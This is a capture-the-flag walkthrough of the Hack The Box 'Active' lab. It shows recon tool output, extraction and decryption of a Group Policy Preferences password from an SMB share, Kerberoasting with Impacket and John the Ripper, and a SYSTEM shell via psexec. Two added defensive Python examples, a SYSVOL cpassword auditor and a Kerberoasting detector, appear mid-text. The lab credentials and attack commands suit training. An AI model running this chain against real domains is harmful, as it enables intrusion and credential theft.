This is a walkthrough of the Active box from Hack The Box, done without using Metasploit.
1. Reconnaissance
I initially ran my scan using the nmapAutomator script, but it took almost an hour to complete, and I also lost some of the beginning results when I went back later to copy it. So below is the bottom part; the open ports that stood out to me were LDAP, Kerberos and SMB:
nikto -host 10.10.10.100:593 | tee recon/nikto_10.10.10.100_593.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.100:49157 -o recon/gobuster_10.10.10.100_49157.txt
nikto -host 10.10.10.100:49157 | tee recon/nikto_10.10.10.100_49157.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.100:47001 -o recon/gobuster_10.10.10.100_47001.txt
nikto -host 10.10.10.100:47001 | tee recon/nikto_10.10.10.100_47001.txt

SMB Recon:
smbmap -H 10.10.10.100 | tee recon/smbmap_10.10.10.100.txt
smbclient -L "//10.10.10.100/" -U "guest"% | tee recon/smbclient_10.10.10.100.txt
nmap -Pn -p445 --script vuln -oN recon/SMB_vulns_10.10.10.100.txt 10.10.10.100

DNS Recon:
host -l 10.10.10.100 10.10.10.100 | tee recon/hostname_10.10.10.100.txt
dnsrecon -r 10.10.10.0/24 -n 10.10.10.100 | tee recon/dnsrecon_10.10.10.100.txt
dnsrecon -r 127.0.0.0/24 -n 10.10.10.100 | tee recon/dnsrecon-local_10.10.10.100.txt
dig -x 10.10.10.100 @10.10.10.100 | tee recon/dig_10.10.10.100.txt

ldap Recon:
ldapsearch -x -h 10.10.10.100 -s base | tee recon/ldapsearch_10.10.10.100.txt
ldapsearch -x -h 10.10.10.100 -b $(cat recon/ldapsearch_10.10.10.100.txt | grep rootDomainNamingContext | cut -d ' ' -f2) | tee recon/ldapsearch_DC_10.10.10.100.txt
nmap -Pn -p 389 --script ldap-search --script-args 'ldap.username="$(cat recon/ldapsearch_10.10.10.100.txt | grep rootDomainNamingContext | cut -d \ \ -f2)"' 10.10.10.100 -oN recon/nmap_ldap_10.10.10.100.txt

Which commands would you like to run?
All (Default), dig, dnsrecon, gobuster, host, ldapsearch, nikto, nmap, smbclient, smbmap, Skip <!>

Running Default in (1) s:

---------------------Running Recon Commands----------------------

Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.100:593
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/14 18:45:00 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.100:593/: Get http://10.10.10.100:593/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)

Finished gobuster scan
=========================

Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.10.10.100:593
---------------------------------------------------------------------------
+ 0 host(s) tested

Finished nikto scan
=========================

Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.100:49157
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/14 18:45:31 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to http://10.10.10.100:49157/: Get http://10.10.10.100:49157/: net/http: request canceled (Client.Timeout exceeded while awaiting headers)

Finished gobuster scan
=========================

Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.10.10.100:49157
---------------------------------------------------------------------------
+ 0 host(s) tested

Finished nikto scan
=========================

Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.100:47001
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/14 18:46:02 Starting gobuster
===============================================================
===============================================================
2020/10/14 18:47:28 Finished
===============================================================

Finished gobuster scan
=========================

Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.100
+ Target Hostname:    10.10.10.100
+ Target Port:        47001
+ Start Time:         2020-10-14 18:47:29 (GMT-7)
---------------------------------------------------------------------------
+ Server: Microsoft-HTTPAPI/2.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7870 requests: 6 error(s) and 3 item(s) reported on remote host
+ End Time:           2020-10-14 19:13:35 (GMT-7) (1566 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Finished nikto scan
=========================

Starting smbmap scan
[+] IP: 10.10.10.100:445	Name: 10.10.10.100
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share
	Replication                                       	READ ONLY
	SYSVOL                                            	NO ACCESS	Logon server share
	Users                                             	NO ACCESS

Finished smbmap scan
=========================

Starting smbclient scan
session setup failed: NT_STATUS_ACCOUNT_DISABLED

Finished smbclient scan
=========================

Starting nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 19:13 PDT
Nmap scan report for 10.10.10.100
Host is up (0.090s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 24.44 seconds

Finished nmap scan
=========================

Starting host scan
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases:

Host 100.10.10.10.in-addr.arpa not found: 2(SERVFAIL)

Finished host scan
=========================

Starting dnsrecon scan
[*] Reverse Look-up of a Range
[*] Performing Reverse Lookup from 10.10.10.0 to 10.10.10.255
[+] 0 Records Found

Finished dnsrecon scan
=========================

Starting dnsrecon scan
[*] Reverse Look-up of a Range
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] 	 {'type': 'PTR', 'name': 'localhost', 'address': '127.0.0.1'}
[+] 1 Records Found

Finished dnsrecon scan
=========================

Starting dig scan

; <<>> DiG 9.16.2-Debian <<>> -x 10.10.10.100 @10.10.10.100
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: FORMERR, id: 51358
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: acbe1120bbb7b8f5 (echoed)
;; QUESTION SECTION:
;100.10.10.10.in-addr.arpa.	IN	PTR

;; Query time: 99 msec
;; SERVER: 10.10.10.100#53(10.10.10.100)
;; WHEN: Wed Oct 14 19:17:14 PDT 2020
;; MSG SIZE  rcvd: 66

Finished dig scan
=========================

Starting ldapsearch scan
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
currentTime: 20201015021913.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=active,DC=htb
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb
defaultNamingContext: DC=active,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=active,DC=htb
configurationNamingContext: CN=Configuration,DC=active,DC=htb
rootDomainNamingContext: DC=active,DC=htb
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 90154
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: DC.active.htb
ldapServiceName: active.htb:dc$@ACTIVE.HTB
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=active,DC=htb
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 4
forestFunctionality: 4
domainControllerFunctionality: 4

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Finished ldapsearch scan
=========================

Starting ldapsearch scan
# extended LDIF
#
# LDAPv3
# base <DC=active,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C09075A, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v1db1

# numResponses: 1

Finished ldapsearch scan
=========================

Starting nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 19:17 PDT
Nmap scan report for 10.10.10.100
Host is up (0.085s latency).

PORT    STATE SERVICE
389/tcp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds

Finished nmap scan
=========================

---------------------Finished all Nmap scans---------------------

Completed in 56 minute(s) and 26 second(s)

root@kali:/home/churr0s/Scripts/nmapAutomator#
You can see from the smbmap results that there is also a readable share called “Replication”, and it can be accessed anonymously.
You can get similar results by running:
- a regular nmap scan
- nmap --script vuln 10.10.10.100
- nmap --script ldap-search.nse -p 389,3268 10.10.10.100
- enum4linux -a 10.10.10.100 (to view SMB shares). This also shows us the domain name, active.htb. Once you know this, you can add an entry to your machine’s /etc/hosts file mapping active.htb to 10.10.10.100 to make further enumeration easier.
- smbclient -L 10.10.10.100 (to view SMB shares)
Now let’s use smbclient to access Replication and see what we can find (the AutoRecon tool would also be good for this):
smbclient //10.10.10.100/Replication
There’s an interesting file called Groups.xml. I’m going to download it to my machine and open it:
smb: \> get Groups.xml
- this will download Groups.xml to your current working directory on your own machine
Now let’s cat the file and see what’s in it:
We can see there is a user called SVC_TGS and an encrypted password. A little background on Groups.xml: these files come from Group Policy Preferences (GPP), a feature introduced with Windows Server 2008. When a new GPP is created, an XML file is written alongside it with the configuration, including a password if one was provided. That password is AES-256 encrypted, but the key is published in Microsoft’s own documentation, so anyone who can read the file can decrypt it. If a system has patch MS14-025 installed, admins can no longer put password data into a Group Policy Preference, though the patch does not remove XML files that already contain one.
We can use a tool called gpp-decrypt, which comes with Kali, to decrypt this cpassword value:
So now we have the username (SVC_TGS) and the password (GPPstillStandingStrong2k18).
There was also a share called “Users”, and now we have a username and password, so let’s see if we can log in!
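As an added example (not part of the original walkthrough), here is the check a defender would run after MS14-025: walk a local copy of SYSVOL and report every GPP XML element that still carries a non-empty cpassword. The sample Groups.xml and its cpassword value below are constructed, not values from the box.

```python
# Audit Group Policy Preference XML for stored cpassword values. Added
# example, not from the original walkthrough; assumes a SYSVOL copy is
# available locally. The sample XML below is constructed.
import os
import xml.etree.ElementTree as ET

# GPP file types that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

def find_cpasswords(xml_text, source="<string>"):
    # Return (source, tag, account, cpassword) for every element whose
    # cpassword attribute is non-empty; an empty attribute stores nothing.
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue
        account = (elem.get("userName") or elem.get("accountName")
                   or elem.get("runAs") or elem.get("newName") or "?")
        findings.append((source, elem.tag, account, cpw))
    return findings

def audit_sysvol(path):
    # Walk a SYSVOL tree and collect findings from every GPP file in it.
    findings = []
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings

# Constructed sample in the shape of a GPP Groups.xml; the cpassword is a
# placeholder, not a real value from the box.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000000}">
  <User clsid="{00000000-0000-0000-0000-000000000001}" name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="PLACEHOLDER_BASE64_CIPHERTEXT"
                userName="active.htb\\SVC_TGS" neverExpires="1"/>
  </User>
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="active.htb\\clean">
    <Properties action="U" cpassword="" userName="active.htb\\clean"/>
  </User>
</Groups>"""
```

Run `audit_sysvol("/path/to/sysvol_copy")` against a mounted or copied SYSVOL; anything it returns is a credential that should be removed from the preference and rotated.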
2. Initial foothold
We’re going to try to log into the Users share with the username and password we just got:
smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Success, and we can find a user flag for SVC_TGS! Since we’re just accessing a share and are not actually on the box, we need to download the flag to our own machine to read it, using get user.txt:
3. Privilege escalation
We know we have credentials for user SVC_TGS, but they are not admin credentials, so we need to try to escalate privileges. We will need to request a TGS (a Kerberos service ticket). I found the following background info on it here:
Windows uses Service Principal Names (SPNs) to identify which service account is being used to encrypt the TGS. Each domain user can request a TGS from a domain controller for any service that has a registered SPN. When the TGS is created, the DC doesn’t check whether the requesting user is authorized to access the resource. It is being done by the service.
In another sense, a Kerberoasting attack allows any valid domain account to request a service ticket for any service and then use the ticket for offline password cracking attempts.
The PowerShell Empire project has a module called Invoke-Kerberoast. It lists all the SPNs in a domain and requests a TGS for every service account; that output can then be used to crack the passwords. However, we don’t have access to PowerShell, so we can use a similar Python script: Impacket’s GetUserSPNs.py. Please note that GetUserSPNs.py requires the username and password of a domain user (which we have!).
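From the defender’s side, an added example (not from the original walkthrough) that flags the trace this attack leaves in Windows Security event 4769: one account requesting RC4 service tickets for several service accounts within a short window. It assumes the events were exported as one key=value record per line; the sample lines are constructed.

```python
# Flag likely Kerberoasting from Windows Security event 4769 records. Added
# example, not from the original walkthrough; assumes events were exported as
# one record per line of key=value fields. Sample lines below are constructed.
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES tickets are 0x11 / 0x12

def parse_event(line):
    fields = dict(kv.split("=", 1) for kv in line.strip().split("|"))
    fields["ts"] = datetime.fromisoformat(fields["ts"])
    return fields

def is_roast_candidate(ev):
    # A successful RC4 service ticket for a user (non-machine, non-krbtgt)
    # service account is what a roaster asks for so the hash cracks fast.
    svc = ev["service"].lower()
    return (ev["event"] == "4769" and ev["etype"] == RC4_HMAC
            and ev["status"] == "0x0" and svc != "krbtgt"
            and not svc.endswith("$"))

def find_roasters(lines, window_s=60, min_services=3):
    # Report requesters that pull tickets for >= min_services distinct
    # service accounts within window_s seconds (bulk SPN harvesting).
    by_user = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if is_roast_candidate(ev):
            by_user[ev["user"]].append((ev["ts"], ev["service"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            svcs = {s for t, s in reqs[i:] if (t - t0).total_seconds() <= window_s}
            if len(svcs) >= min_services:
                flagged[user] = sorted(svcs)
                break
    return flagged

# Constructed sample: one account pulls RC4 tickets for several services in
# two seconds; a normal user's AES requests are left alone.
SAMPLE_4769 = [
    "ts=2020-10-14T19:20:01|event=4769|user=SVC_TGS@ACTIVE.HTB|service=Administrator|etype=0x17|status=0x0",
    "ts=2020-10-14T19:20:01|event=4769|user=SVC_TGS@ACTIVE.HTB|service=sqlsvc|etype=0x17|status=0x0",
    "ts=2020-10-14T19:20:02|event=4769|user=SVC_TGS@ACTIVE.HTB|service=httpsvc|etype=0x17|status=0x0",
    "ts=2020-10-14T19:20:02|event=4769|user=SVC_TGS@ACTIVE.HTB|service=DC$|etype=0x17|status=0x0",
    "ts=2020-10-14T19:25:00|event=4769|user=jdoe@ACTIVE.HTB|service=krbtgt|etype=0x12|status=0x0",
    "ts=2020-10-14T19:26:00|event=4769|user=jdoe@ACTIVE.HTB|service=sqlsvc|etype=0x12|status=0x0",
]
```

`find_roasters(SAMPLE_4769)` flags only SVC_TGS; the same logic applied to real exports pairs well with the mitigation of giving service accounts long passwords (or gMSAs) and AES-only encryption types.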
Install impacket, and then locate and copy GetUserSPNs.py to your working directory (I renamed mine SPNs.py)
Now type the following to run the script:
python SPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -save
The result will be a password hash. Now we need to crack it. Let’s use John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hashkerberos
- rockyou.txt is a wordlist that comes included with Kali
- hashkerberos is the name of the file I saved the password hash in
The result shows us the cracked password: Ticketmaster1968
Now that we have Administrator credentials, we can use Impacket’s psexec.py to log in with them!
Locate psexec.py and copy it over to your working directory (I renamed mine pe.py)
Then type:
python psexec.py Administrator@10.10.10.100
We are now root (NT AUTHORITY\SYSTEM on Windows). Grab the flag!